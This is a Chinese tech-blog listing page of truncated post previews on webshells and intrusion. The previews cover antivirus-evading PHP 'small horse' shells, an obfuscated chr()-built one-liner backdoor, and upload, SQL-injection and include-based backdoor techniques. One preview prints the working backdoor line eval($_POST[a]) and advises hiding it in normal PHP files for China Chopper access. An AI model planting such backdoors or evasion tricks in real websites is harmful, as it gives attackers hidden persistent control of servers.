作者: 科技小能手
1199人浏览
评论数:0
5年前
PHP小马免杀 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/ht
作者: 科技小能手
2453人浏览
评论数:0
5年前
强悍的PHP一句话后门 常用一: <?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr(
作者: 技术小甜
1335人浏览
评论数:0
5年前
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽
作者: 余二五
1249人浏览
评论数:0
5年前
很多人在做开发的时候并没有注意到SQL的查询是可以被改掉的,其实SQL却是最不安全的因素之一,通过SQL,更有可能去直接执行系统命令,在服务器上新建用户,修改密码等操作也不是不可能。 直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技
作者: bypass
1204人浏览
评论数:0
6年前
原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接
作者: 技术小美
1017人浏览
评论数:0
5年前
nginx前几天nginx和IIS7都爆解析漏洞,搞了几个shell都 丢了,于是想寻找一个超级隐蔽的后门方法。无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索include函数漏洞,得到的结果很少.绝大多数是关于文件包含漏洞,比如
作者: 初雪之路
1920人浏览
评论数:0
3年前
运维安全术语 1、抓鸡/肉鸡 1.1 什么是抓鸡? 通过扫描弱口令/爆破/漏洞自动化种马达到控制机器。常用的有:1433抓鸡、3389抓鸡、3306抓鸡等 1.2 什么是1433抓鸡?(微软的SQL server的端口号为1433) 用IP扫描工具批量扫描大
作者: 科技小能手
1309人浏览
评论数:0
5年前
任务:某公司授权你对其服务器进行攻击渗透。对某核心服务器进行入侵测试,据了解,该web服务器ip地址(10.1.1.178)存在敏感数据。 1、利用网站漏洞获取该服务器shell 2、新建一用户并将权限提升至管理员 3、获得服务器上的关键敏感数据(C:\con
